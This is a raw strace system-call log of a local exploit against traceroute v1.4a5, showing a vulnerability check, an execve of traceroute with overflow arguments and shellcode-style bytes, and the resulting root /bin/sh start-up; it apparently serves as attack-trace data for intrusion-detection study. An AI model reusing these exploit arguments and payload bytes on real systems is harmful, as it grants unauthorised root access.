819   19:04:53 [????????] execve("./exploi", ["./exploi", "-f", "0x0804c7c4", "-s", "0xbfffff89"], [/* 19 vars */]) = 0
819   19:04:53 [4000f78c] brk(0)        = 0x804a498 <0.000015>
819   19:04:53 [4000f84d] old_mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x40014000 <0.000014>
819   19:04:53 [4000ee54] open("/etc/ld.so.preload", O_RDONLY) = -1 ENOENT (No such file or directory) <0.000023>
819   19:04:53 [4000ee54] open("/etc/ld.so.cache", O_RDONLY) = 4 <0.000014>
819   19:04:53 [4000ed5d] fstat(4, {st_mode=S_IFREG|0644, st_size=12210, ...}) = 0 <0.000009>
819   19:04:53 [4000f84d] old_mmap(NULL, 12210, PROT_READ, MAP_PRIVATE, 4, 0) = 0x40015000 <0.000015>
819   19:04:53 [4000ee8d] close(4)      = 0 <0.000007>
819   19:04:53 [4000ee54] open("/lib/libc.so.6", O_RDONLY) = 4 <0.000021>
819   19:04:53 [4000ed5d] fstat(4, {st_mode=S_IFREG|0755, st_size=4101324, ...}) = 0 <0.000007>
819   19:04:53 [4000eed4] read(4, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\210\212"..., 4096) = 4096 <0.000038>
819   19:04:53 [4000f84d] old_mmap(NULL, 1001564, PROT_READ|PROT_EXEC, MAP_PRIVATE, 4, 0) = 0x40018000 <0.000013>
819   19:04:53 [4000f8d4] mprotect(0x40105000, 30812, PROT_NONE) = 0 <0.000012>
819   19:04:53 [4000f84d] old_mmap(0x40105000, 16384, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED, 4, 0xec000) = 0x40105000 <0.000015>
819   19:04:53 [4000f84d] old_mmap(0x40109000, 14428, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0x40109000 <0.000012>
819   19:04:53 [4000ee8d] close(4)      = 0 <0.000007>
819   19:04:53 [4000f8d4] mprotect(0x40018000, 970752, PROT_READ|PROT_WRITE) = 0 <0.000014>
819   19:04:53 [4000f8d4] mprotect(0x40018000, 970752, PROT_READ|PROT_EXEC) = 0 <0.000025>
819   19:04:53 [4000f891] munmap(0x40015000, 12210) = 0 <0.000022>
819   19:04:53 [400ca7fd] personality(PER_LINUX) = 0 <0.000009>
819   19:04:53 [400aa257] getpid()      = 819 <0.000006>
819   19:04:53 [400bdc8c] fstat64(0x1, 0xbfffef50) = -1 ENOSYS (Function not implemented) <0.000007>
819   19:04:53 [400bdcd3] fstat(1, {st_mode=S_IFCHR|0620, st_rdev=makedev(4, 1), ...}) = 0 <0.000009>
819   19:04:53 [400c7afd] old_mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x40015000 <0.000018>
819   19:04:53 [400c4b54] ioctl(1, TCGETS, {B38400 opost isig icanon echo ...}) = 0 <0.000019>
819   19:04:53 [400beb14] write(1, "Traceroute v1.4a5 exploit by sor"..., 54) = 54 <0.000091>
819   19:04:53 [400a9c97] fork()        = 820 <0.000097>
819   19:04:53 [400beb14] write(1, "Checking vuln...\n", 17) = 17 <0.000051>
820   19:04:53 [400a9d7b] execve("/usr/sbin/traceroute", ["/usr/sbin/traceroute", "-g", "1", "-g", "1"], [/* 0 vars */]) = 0 <0.000301>
820   19:04:53 [4000f78c] brk(0)        = 0x804cedc <0.000007>
820   19:04:53 [4000f84d] old_mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x40014000 <0.000014>
820   19:04:53 [4000ee54] open("/etc/ld.so.preload", O_RDONLY) = -1 ENOENT (No such file or directory) <0.000024>
820   19:04:53 [4000ee54] open("/etc/ld.so.cache", O_RDONLY) = 4 <0.000014>
820   19:04:53 [4000ed5d] fstat(4, {st_mode=S_IFREG|0644, st_size=12210, ...}) = 0 <0.000009>
820   19:04:53 [4000f84d] old_mmap(NULL, 12210, PROT_READ, MAP_PRIVATE, 4, 0) = 0x40015000 <0.000014>
820   19:04:53 [4000ee8d] close(4)      = 0 <0.000008>
820   19:04:53 [4000ee54] open("/lib/libc.so.6", O_RDONLY) = 4 <0.000019>
820   19:04:53 [4000ed5d] fstat(4, {st_mode=S_IFREG|0755, st_size=4101324, ...}) = 0 <0.000008>
820   19:04:53 [4000eed4] read(4, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\210\212"..., 4096) = 4096 <0.000028>
820   19:04:53 [4000f84d] old_mmap(NULL, 1001564, PROT_READ|PROT_EXEC, MAP_PRIVATE, 4, 0) = 0x40018000 <0.000012>
820   19:04:53 [4000f8d4] mprotect(0x40105000, 30812, PROT_NONE) = 0 <0.000011>
820   19:04:53 [4000f84d] old_mmap(0x40105000, 16384, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED, 4, 0xec000) = 0x40105000 <0.000015>
820   19:04:53 [4000f84d] old_mmap(0x40109000, 14428, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0x40109000 <0.000011>
820   19:04:53 [4000ee8d] close(4)      = 0 <0.000008>
820   19:04:53 [4000f8d4] mprotect(0x40018000, 970752, PROT_READ|PROT_WRITE) = 0 <0.000012>
820   19:04:53 [4000f8d4] mprotect(0x40018000, 970752, PROT_READ|PROT_EXEC) = 0 <0.000023>
820   19:04:53 [4000f891] munmap(0x40015000, 12210) = 0 <0.000023>
820   19:04:53 [400ca7fd] personality(PER_LINUX) = 0 <0.000007>
820   19:04:53 [400aa257] getpid()      = 820 <0.000006>
820   19:04:53 [400c4a6c] brk(0)        = 0x804cedc <0.000008>
820   19:04:53 [400c4a6c] brk(0x804cefc) = 0x804cefc <0.000006>
820   19:04:53 [400c4a6c] brk(0x804d000) = 0x804d000 <0.000006>
820   19:04:53 [400c4a6c] brk(0x804e000) = 0x804e000 <0.000015>
819   19:04:53 [400a98e9] wait4(-1, [WIFSIGNALED(s) && WTERMSIG(s) == SIGSEGV], 0, NULL) = 820 <0.000011>
819   19:04:53 [400beb14] write(1, "VULN!\n", 6) = 6 <0.000056>
819   19:04:53 [400beb14] write(1, "Lets ride...\n", 13) = 13 <0.000048>
819   19:04:53 [400beb14] write(1, "Trying bfffff89\n", 16) = 16 <0.000047>
819   19:04:53 [400a9d7b] execve("/usr/sbin/traceroute", ["exploited", "-g", "1.2.34", "-g", "1.2.3.17 sex\374\377\377\377\270\307\4\10\211\377\377\277"..., "\353\n\353\n\353\n\353\n\353\n\353\n\353\n\353\n\353\n"...], [/* 0 vars */]) = 0 <0.000297>
819   19:04:53 [4000f78c] brk(0)        = 0x804cedc <0.000007>
819   19:04:53 [4000f84d] old_mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x40014000 <0.000013>
819   19:04:53 [4000ee54] open("/etc/ld.so.preload", O_RDONLY) = -1 ENOENT (No such file or directory) <0.000022>
819   19:04:53 [4000ee54] open("/etc/ld.so.cache", O_RDONLY) = 4 <0.000014>
819   19:04:53 [4000ed5d] fstat(4, {st_mode=S_IFREG|0644, st_size=12210, ...}) = 0 <0.000009>
819   19:04:53 [4000f84d] old_mmap(NULL, 12210, PROT_READ, MAP_PRIVATE, 4, 0) = 0x40015000 <0.000014>
819   19:04:53 [4000ee8d] close(4)      = 0 <0.000007>
819   19:04:53 [4000ee54] open("/lib/libc.so.6", O_RDONLY) = 4 <0.000018>
819   19:04:53 [4000ed5d] fstat(4, {st_mode=S_IFREG|0755, st_size=4101324, ...}) = 0 <0.000008>
819   19:04:53 [4000eed4] read(4, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\210\212"..., 4096) = 4096 <0.000033>
819   19:04:53 [4000f84d] old_mmap(NULL, 1001564, PROT_READ|PROT_EXEC, MAP_PRIVATE, 4, 0) = 0x40018000 <0.000013>
819   19:04:53 [4000f8d4] mprotect(0x40105000, 30812, PROT_NONE) = 0 <0.000013>
819   19:04:53 [4000f84d] old_mmap(0x40105000, 16384, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED, 4, 0xec000) = 0x40105000 <0.000014>
819   19:04:53 [4000f84d] old_mmap(0x40109000, 14428, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0x40109000 <0.000011>
819   19:04:53 [4000ee8d] close(4)      = 0 <0.000006>
819   19:04:53 [4000f8d4] mprotect(0x40018000, 970752, PROT_READ|PROT_WRITE) = 0 <0.000013>
819   19:04:53 [4000f8d4] mprotect(0x40018000, 970752, PROT_READ|PROT_EXEC) = 0 <0.000023>
819   19:04:53 [4000f891] munmap(0x40015000, 12210) = 0 <0.000022>
819   19:04:53 [400ca7fd] personality(PER_LINUX) = 0 <0.000008>
819   19:04:53 [400aa257] getpid()      = 819 <0.000007>
819   19:04:53 [400c4a6c] brk(0)        = 0x804cedc <0.000007>
819   19:04:53 [400c4a6c] brk(0x804cefc) = 0x804cefc <0.000006>
819   19:04:53 [400c4a6c] brk(0x804d000) = 0x804d000 <0.000006>
819   19:04:53 [400c4a6c] brk(0x804e000) = 0x804e000 <0.000013>
819   19:04:53 [bfffffd3] execve("/bin/sh", ["/bin/sh"], [/* 0 vars */]) = 0 <0.000287>
819   19:04:53 [4000f78c] brk(0)        = 0x80994a0 <0.000006>
819   19:04:53 [4000f84d] old_mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x40014000 <0.000013>
819   19:04:53 [4000ee54] open("/etc/ld.so.preload", O_RDONLY) = -1 ENOENT (No such file or directory) <0.000023>
819   19:04:53 [4000ee54] open("/etc/ld.so.cache", O_RDONLY) = 4 <0.000015>
819   19:04:53 [4000ed5d] fstat(4, {st_mode=S_IFREG|0644, st_size=12210, ...}) = 0 <0.000009>
819   19:04:53 [4000f84d] old_mmap(NULL, 12210, PROT_READ, MAP_PRIVATE, 4, 0) = 0x40015000 <0.000013>
819   19:04:53 [4000ee8d] close(4)      = 0 <0.000008>
819   19:04:53 [4000ee54] open("/lib/libtermcap.so.2", O_RDONLY) = 4 <0.000021>
819   19:04:53 [4000ed5d] fstat(4, {st_mode=S_IFREG|0755, st_size=12224, ...}) = 0 <0.000007>
819   19:04:53 [4000eed4] read(4, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0000\16\0"..., 4096) = 4096 <0.000041>
819   19:04:53 [4000f84d] old_mmap(NULL, 15304, PROT_READ|PROT_EXEC, MAP_PRIVATE, 4, 0) = 0x40018000 <0.000011>
819   19:04:53 [4000f8d4] mprotect(0x4001b000, 3016, PROT_NONE) = 0 <0.000011>
819   19:04:53 [4000f84d] old_mmap(0x4001b000, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED, 4, 0x2000) = 0x4001b000 <0.000016>
819   19:04:53 [4000ee8d] close(4)      = 0 <0.000008>
819   19:04:53 [4000ee54] open("/lib/libc.so.6", O_RDONLY) = 4 <0.000024>
819   19:04:53 [4000ed5d] fstat(4, {st_mode=S_IFREG|0755, st_size=4101324, ...}) = 0 <0.000008>
819   19:04:53 [4000eed4] read(4, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\210\212"..., 4096) = 4096 <0.000032>
819   19:04:53 [4000f84d] old_mmap(NULL, 1001564, PROT_READ|PROT_EXEC, MAP_PRIVATE, 4, 0) = 0x4001c000 <0.000012>
819   19:04:53 [4000f8d4] mprotect(0x40109000, 30812, PROT_NONE) = 0 <0.000009>
819   19:04:53 [4000f84d] old_mmap(0x40109000, 16384, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED, 4, 0xec000) = 0x40109000 <0.000013>
819   19:04:53 [4000f84d] old_mmap(0x4010d000, 14428, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0x4010d000 <0.000012>
819   19:04:53 [4000ee8d] close(4)      = 0 <0.000006>
819   19:04:53 [4000f8d4] mprotect(0x4001c000, 970752, PROT_READ|PROT_WRITE) = 0 <0.000014>
819   19:04:53 [4000f8d4] mprotect(0x4001c000, 970752, PROT_READ|PROT_EXEC) = 0 <0.000025>
819   19:04:53 [4000f891] munmap(0x40015000, 12210) = 0 <0.000022>
819   19:04:53 [400ce7fd] personality(PER_LINUX) = 0 <0.000007>
819   19:04:53 [400ae257] getpid()      = 819 <0.000007>
819   19:04:53 [400ae2b7] getuid()      = 0 <0.000006>
819   19:04:53 [400ae317] getgid()      = 0 <0.000006>
819   19:04:53 [400ae2e7] geteuid()     = 0 <0.000006>
819   19:04:53 [400ae347] getegid()     = 0 <0.000006>
819   19:04:53 [400c8a6c] brk(0)        = 0x80994a0 <0.000007>
819   19:04:53 [400c8a6c] brk(0x80994c0) = 0x80994c0 <0.000006>
819   19:04:53 [400c8a6c] brk(0x809a000) = 0x809a000 <0.000006>
819   19:04:53 [400a4f7d] time(NULL)    = 1142550293 <0.000006>
819   19:04:53 [400c8b54] ioctl(0, TCGETS, {B38400 opost isig icanon echo ...}) = 0 <0.000016>
819   19:04:53 [400c8b54] ioctl(1, TCGETS, {B38400 opost isig icanon echo ...}) = 0 <0.000008>
819   19:04:53 [4003aae2] rt_sigaction(SIGCHLD, {SIG_DFL}, {SIG_DFL}, 8) = 0 <0.000010>
819   19:04:53 [4003aae2] rt_sigaction(SIGCHLD, {SIG_DFL}, {SIG_DFL}, 8) = 0 <0.000006>
819   19:04:53 [4003aae2] rt_sigaction(SIGINT, {SIG_DFL}, {SIG_DFL}, 8) = 0 <0.000006>
819   19:04:53 [4003aae2] rt_sigaction(SIGINT, {SIG_DFL}, {SIG_DFL}, 8) = 0 <0.000006>
819   19:04:53 [4003aae2] rt_sigaction(SIGQUIT, {SIG_DFL}, {SIG_DFL}, 8) = 0 <0.000007>
819   19:04:53 [4003aae2] rt_sigaction(SIGQUIT, {SIG_DFL}, {SIG_DFL}, 8) = 0 <0.000006>
819   19:04:53 [4003aae2] rt_sigaction(SIGTERM, {SIG_DFL}, {SIG_DFL}, 8) = 0 <0.000007>
819   19:04:53 [4003aae2] rt_sigaction(SIGTERM, {SIG_DFL}, {SIG_DFL}, 8) = 0 <0.000007>
819   19:04:53 [4003aae2] rt_sigaction(SIGHUP, {0x804b8c0, [HUP INT ILL TRAP ABRT BUS FPE USR1 SEGV USR2 PIPE ALRM TERM XCPU XFSZ VTALRM PROF UNUSED], 0x4000000}, {SIG_DFL}, 8) = 0 <0.000008>
819   19:04:53 [4003aae2] rt_sigaction(SIGINT, {0x804b8c0, [HUP INT ILL TRAP ABRT BUS FPE USR1 SEGV USR2 PIPE ALRM TERM XCPU XFSZ VTALRM PROF UNUSED], 0x4000000}, {SIG_DFL}, 8) = 0 <0.000006>
819   19:04:53 [4003aae2] rt_sigaction(SIGILL, {0x804b8c0, [HUP INT ILL TRAP ABRT BUS FPE USR1 SEGV USR2 PIPE ALRM TERM XCPU XFSZ VTALRM PROF UNUSED], 0x4000000}, {SIG_DFL}, 8) = 0 <0.000007>
819   19:04:53 [4003aae2] rt_sigaction(SIGTRAP, {0x804b8c0, [HUP INT ILL TRAP ABRT BUS FPE USR1 SEGV USR2 PIPE ALRM TERM XCPU XFSZ VTALRM PROF UNUSED], 0x4000000}, {SIG_DFL}, 8) = 0 <0.000007>
819   19:04:53 [4003aae2] rt_sigaction(SIGABRT, {0x804b8c0, [HUP INT ILL TRAP ABRT BUS FPE USR1 SEGV USR2 PIPE ALRM TERM XCPU XFSZ VTALRM PROF UNUSED], 0x4000000}, {SIG_DFL}, 8) = 0 <0.000007>
819   19:04:53 [4003aae2] rt_sigaction(SIGFPE, {0x804b8c0, [HUP INT ILL TRAP ABRT BUS FPE USR1 SEGV USR2 PIPE ALRM TERM XCPU XFSZ VTALRM PROF UNUSED], 0x4000000}, {SIG_DFL}, 8) = 0 <0.000007>
819   19:04:53 [4003aae2] rt_sigaction(SIGBUS, {0x804b8c0, [HUP INT ILL TRAP ABRT BUS FPE USR1 SEGV USR2 PIPE ALRM TERM XCPU XFSZ VTALRM PROF UNUSED], 0x4000000}, {SIG_DFL}, 8) = 0 <0.000007>
819   19:04:53 [4003aae2] rt_sigaction(SIGSEGV, {0x804b8c0, [HUP INT ILL TRAP ABRT BUS FPE USR1 SEGV USR2 PIPE ALRM TERM XCPU XFSZ VTALRM PROF UNUSED], 0x4000000}, {SIG_DFL}, 8) = 0 <0.000007>
819   19:04:53 [4003aae2] rt_sigaction(SIGUNUSED, {0x804b8c0, [HUP INT ILL TRAP ABRT BUS FPE USR1 SEGV USR2 PIPE ALRM TERM XCPU XFSZ VTALRM PROF UNUSED], 0x4000000}, {SIG_DFL}, 8) = 0 <0.000008>
819   19:04:53 [4003aae2] rt_sigaction(SIGPIPE, {0x804b8c0, [HUP INT ILL TRAP ABRT BUS FPE USR1 SEGV USR2 PIPE ALRM TERM XCPU XFSZ VTALRM PROF UNUSED], 0x4000000}, {SIG_DFL}, 8) = 0 <0.000008>
819   19:04:53 [4003aae2] rt_sigaction(SIGALRM, {0x804b8c0, [HUP INT ILL TRAP ABRT BUS FPE USR1 SEGV USR2 PIPE ALRM TERM XCPU XFSZ VTALRM PROF UNUSED], 0x4000000}, {SIG_DFL}, 8) = 0 <0.000007>
819   19:04:53 [4003aae2] rt_sigaction(SIGTERM, {0x804b8c0, [HUP INT ILL TRAP ABRT BUS FPE USR1 SEGV USR2 PIPE ALRM TERM XCPU XFSZ VTALRM PROF UNUSED], 0x4000000}, {SIG_DFL}, 8) = 0 <0.000007>
819   19:04:53 [4003aae2] rt_sigaction(SIGXCPU, {0x804b8c0, [HUP INT ILL TRAP ABRT BUS FPE USR1 SEGV USR2 PIPE ALRM TERM XCPU XFSZ VTALRM PROF UNUSED], 0x4000000}, {SIG_DFL}, 8) = 0 <0.000007>
819   19:04:53 [4003aae2] rt_sigaction(SIGXFSZ, {0x804b8c0, [HUP INT ILL TRAP ABRT BUS FPE USR1 SEGV USR2 PIPE ALRM TERM XCPU XFSZ VTALRM PROF UNUSED], 0x4000000}, {SIG_DFL}, 8) = 0 <0.000007>
819   19:04:53 [4003aae2] rt_sigaction(SIGVTALRM, {0x804b8c0, [HUP INT ILL TRAP ABRT BUS FPE USR1 SEGV USR2 PIPE ALRM TERM XCPU XFSZ VTALRM PROF UNUSED], 0x4000000}, {SIG_DFL}, 8) = 0 <0.000007>
819   19:04:53 [4003aae2] rt_sigaction(SIGPROF, {0x804b8c0, [HUP INT ILL TRAP ABRT BUS FPE USR1 SEGV USR2 PIPE ALRM TERM XCPU XFSZ VTALRM PROF UNUSED], 0x4000000}, {SIG_DFL}, 8) = 0 <0.000007>
819   19:04:53 [4003aae2] rt_sigaction(SIGUSR1, {0x804b8c0, [HUP INT ILL TRAP ABRT BUS FPE USR1 SEGV USR2 PIPE ALRM TERM XCPU XFSZ VTALRM PROF UNUSED], 0x4000000}, {SIG_DFL}, 8) = 0 <0.000007>
819   19:04:53 [4003aae2] rt_sigaction(SIGUSR2, {0x804b8c0, [HUP INT ILL TRAP ABRT BUS FPE USR1 SEGV USR2 PIPE ALRM TERM XCPU XFSZ VTALRM PROF UNUSED], 0x4000000}, {SIG_DFL}, 8) = 0 <0.000007>
819   19:04:53 [4003acb5] rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0 <0.000006>
819   19:04:53 [4003aae2] rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_DFL}, 8) = 0 <0.000006>
819   19:04:53 [4003aae2] rt_sigaction(SIGINT, {0x804bc20, [], 0x4000000}, {0x804b8c0, [HUP INT ILL TRAP ABRT BUS FPE USR1 SEGV USR2 PIPE ALRM TERM XCPU XFSZ VTALRM PROF UNUSED], 0x4000000}, 8) = 0 <0.000007>
819   19:04:53 [4003aae2] rt_sigaction(SIGTERM, {SIG_IGN}, {0x804b8c0, [HUP INT ILL TRAP ABRT BUS FPE USR1 SEGV USR2 PIPE ALRM TERM XCPU XFSZ VTALRM PROF UNUSED], 0x4000000}, 8) = 0 <0.000006>
819   19:04:53 [4003aae2] rt_sigaction(SIGINT, {0x804bc20, [], 0x4000000}, {0x804bc20, [], 0x4000000}, 8) = 0 <0.000006>
819   19:04:53 [4003aae2] rt_sigaction(SIGTSTP, {SIG_IGN}, {SIG_DFL}, 8) = 0 <0.000006>
819   19:04:53 [4003aae2] rt_sigaction(SIGTTOU, {SIG_IGN}, {SIG_DFL}, 8) = 0 <0.000006>
819   19:04:53 [4003aae2] rt_sigaction(SIGTTIN, {SIG_IGN}, {SIG_DFL}, 8) = 0 <0.000006>
819   19:04:53 [400cedc2] socket(PF_UNIX, SOCK_STREAM, 0) = 4 <0.000026>
819   19:04:53 [400cea82] connect(4, {sin_family=AF_UNIX, path="                                                                                       /var/run/.nscd_socket"}, 110) = -1 ECONNREFUSED (Connection refused) <0.000024>
819   19:04:53 [400c2a8d] close(4)      = 0 <0.000034>
819   19:04:53 [400c2a24] open("/etc/nsswitch.conf", O_RDONLY) = 4 <0.000022>
819   19:04:53 [400c1c8c] fstat64(0x4, 0xbffffba0) = -1 ENOSYS (Function not implemented) <0.000006>
819   19:04:53 [400c1cd3] fstat(4, {st_mode=S_IFREG|0644, st_size=1744, ...}) = 0 <0.000008>
819   19:04:53 [400cbafd] old_mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x40015000 <0.000020>
819   19:04:53 [400c2ad4] read(4, "#\n# /etc/nsswitch.conf\n#\n# An ex"..., 4096) = 1744 <0.000043>
819   19:04:53 [400c8a6c] brk(0x809b000) = 0x809b000 <0.000012>
819   19:04:53 [400c2ad4] read(4, "", 4096) = 0 <0.000008>
819   19:04:53 [400c2a8d] close(4)      = 0 <0.000009>
819   19:04:53 [400cbb41] munmap(0x40015000, 4096) = 0 <0.000016>
819   19:04:53 [4000ee54] open("/etc/ld.so.cache", O_RDONLY) = 4 <0.000029>
819   19:04:53 [4000ed5d] fstat(4, {st_mode=S_IFREG|0644, st_size=12210, ...}) = 0 <0.000009>
819   19:04:53 [4000f84d] old_mmap(NULL, 12210, PROT_READ, MAP_PRIVATE, 4, 0) = 0x40015000 <0.000017>
819   19:04:53 [4000ee8d] close(4)      = 0 <0.000008>
819   19:04:53 [4000ee54] open("/lib/libnss_files.so.2", O_RDONLY) = 4 <0.000022>
819   19:04:53 [4000ed5d] fstat(4, {st_mode=S_IFREG|0755, st_size=246652, ...}) = 0 <0.000007>
819   19:04:53 [4000eed4] read(4, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0p \0\000"..., 4096) = 4096 <0.000036>
819   19:04:53 [4000f84d] old_mmap(NULL, 36384, PROT_READ|PROT_EXEC, MAP_PRIVATE, 4, 0) = 0x40111000 <0.000015>
819   19:04:53 [4000f8d4] mprotect(0x40119000, 3616, PROT_NONE) = 0 <0.000012>
819   19:04:53 [4000f84d] old_mmap(0x40119000, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED, 4, 0x7000) = 0x40119000 <0.000014>
819   19:04:53 [4000ee8d] close(4)      = 0 <0.000006>
819   19:04:53 [4000f891] munmap(0x40015000, 12210) = 0 <0.000018>
819   19:04:53 [400c2a24] open("/etc/passwd", O_RDONLY) = 4 <0.000028>
819   19:04:53 [400c2ce4] fcntl(4, F_GETFD) = 0 <0.000008>
819   19:04:53 [400c2ce4] fcntl(4, F_SETFD, FD_CLOEXEC) = 0 <0.000006>
819   19:04:53 [400c1cd3] fstat(4, {st_mode=S_IFREG|0644, st_size=704, ...}) = 0 <0.000008>
819   19:04:53 [400cbafd] old_mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x40015000 <0.000017>
819   19:04:53 [400c2ad4] read(4, "root:x:0:0:root:/root:/bin/bash\n"..., 4096) = 704 <0.000036>
819   19:04:53 [400c2a8d] close(4)      = 0 <0.000009>
819   19:04:53 [400cbb41] munmap(0x40015000, 4096) = 0 <0.000010>
819   19:04:53 [400ad7ed] uname({sys="Linux", node="localhost.localdomain", ...}) = 0 <0.000010>
819   19:04:53 [4000ee54] open("/etc/ld.so.cache", O_RDONLY) = 4 <0.000024>
819   19:04:53 [4000ed5d] fstat(4, {st_mode=S_IFREG|0644, st_size=12210, ...}) = 0 <0.000008>
819   19:04:53 [4000f84d] old_mmap(NULL, 12210, PROT_READ, MAP_PRIVATE, 4, 0) = 0x40015000 <0.000015>
819   19:04:53 [4000ee8d] close(4)      = 0 <0.000007>
819   19:04:53 [4000ee54] open("/lib/libnss_nisplus.so.2", O_RDONLY) = 4 <0.000025>
819   19:04:53 [4000ed5d] fstat(4, {st_mode=S_IFREG|0755, st_size=252234, ...}) = 0 <0.000008>
819   19:04:53 [4000eed4] read(4, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\20\37\0"..., 4096) = 4096 <0.000037>
819   19:04:53 [4000f84d] old_mmap(NULL, 41972, PROT_READ|PROT_EXEC, MAP_PRIVATE, 4, 0) = 0x4011a000 <0.000018>
819   19:04:53 [4000f8d4] mprotect(0x40123000, 5108, PROT_NONE) = 0 <0.000011>
819   19:04:53 [4000f84d] old_mmap(0x40123000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED, 4, 0x8000) = 0x40123000 <0.000014>
819   19:04:53 [4000ee8d] close(4)      = 0 <0.000008>
819   19:04:53 [4000ee54] open("/lib/libnsl.so.1", O_RDONLY) = 4 <0.000026>
819   19:04:53 [4000ed5d] fstat(4, {st_mode=S_IFREG|0755, st_size=370141, ...}) = 0 <0.000008>
819   19:04:53 [4000eed4] read(4, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\20?\0\000"..., 4096) = 4096 <0.000033>
819   19:04:53 [4000f84d] old_mmap(NULL, 88104, PROT_READ|PROT_EXEC, MAP_PRIVATE, 4, 0) = 0x40125000 <0.000015>
819   19:04:53 [4000f8d4] mprotect(0x40137000, 14376, PROT_NONE) = 0 <0.000009>
819   19:04:53 [4000f84d] old_mmap(0x40137000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED, 4, 0x11000) = 0x40137000 <0.000013>
819   19:04:53 [4000f84d] old_mmap(0x40139000, 6184, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0x40139000 <0.000014>
819   19:04:53 [4000ee8d] close(4)      = 0 <0.000007>
819   19:04:53 [4000f891] munmap(0x40015000, 12210) = 0 <0.000021>
819   19:04:53 [4000ee54] open("/etc/ld.so.cache", O_RDONLY) = 4 <0.000032>
819   19:04:53 [4000ed5d] fstat(4, {st_mode=S_IFREG|0644, st_size=12210, ...}) = 0 <0.000010>
819   19:04:53 [4000f84d] old_mmap(NULL, 12210, PROT_READ, MAP_PRIVATE, 4, 0) = 0x40015000 <0.000015>
819   19:04:53 [4000ee8d] close(4)      = 0 <0.000007>
819   19:04:53 [4000ee54] open("/lib/libnss_nis.so.2", O_RDONLY) = 4 <0.000022>
819   19:04:53 [4000ed5d] fstat(4, {st_mode=S_IFREG|0755, st_size=255963, ...}) = 0 <0.000007>
819   19:04:53 [4000eed4] read(4, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0`\37\0\000"..., 4096) = 4096 <0.000039>
819   19:04:53 [4000f84d] old_mmap(NULL, 38488, PROT_READ|PROT_EXEC, MAP_PRIVATE, 4, 0) = 0x4013b000 <0.000016>
819   19:04:53 [4000f8d4] mprotect(0x40143000, 5720, PROT_NONE) = 0 <0.000010>
819   19:04:53 [4000f84d] old_mmap(0x40143000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED, 4, 0x7000) = 0x40143000 <0.000014>
819   19:04:53 [4000ee8d] close(4)      = 0 <0.000007>
819   19:04:53 [4000f891] munmap(0x40015000, 12210) = 0 <0.000019>
819   19:04:53 [400c8a6c] brk(0x809c000) = 0x809c000 <0.000015>
819   19:04:53 [400c8a6c] brk(0x809e000) = 0x809e000 <0.000008>
819   19:04:53 [400c31d4] getcwd("/home/kayacik/exploit", 4095) = 22 <0.000013>
819   19:04:53 [400ae257] getpid()      = 819 <0.000006>
819   19:04:53 [400ae287] getppid()     = 818 <0.000005>
819   19:04:53 [400ae2b7] getuid()      = 0 <0.000006>
819   19:04:53 [400c2a24] open("/etc/passwd", O_RDONLY) = 4 <0.000029>
819   19:04:53 [400c2ce4] fcntl(4, F_GETFD) = 0 <0.000008>
819   19:04:53 [400c2ce4] fcntl(4, F_SETFD, FD_CLOEXEC) = 0 <0.000005>
819   19:04:53 [400c1cd3] fstat(4, {st_mode=S_IFREG|0644, st_size=704, ...}) = 0 <0.000007>
819   19:04:53 [400cbafd] old_mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x40015000 <0.000015>
819   19:04:53 [400c2ad4] read(4, "root:x:0:0:root:/root:/bin/bash\n"..., 4096) = 704 <0.000038>
819   19:04:53 [400c2a8d] close(4)      = 0 <0.000010>
819   19:04:53 [400cbb41] munmap(0x40015000, 4096) = 0 <0.000013>
819   19:04:53 [400ae607] getpgrp()     = 818 <0.000007>
819   19:04:53 [400c2fad] dup(2)        = 4 <0.000009>
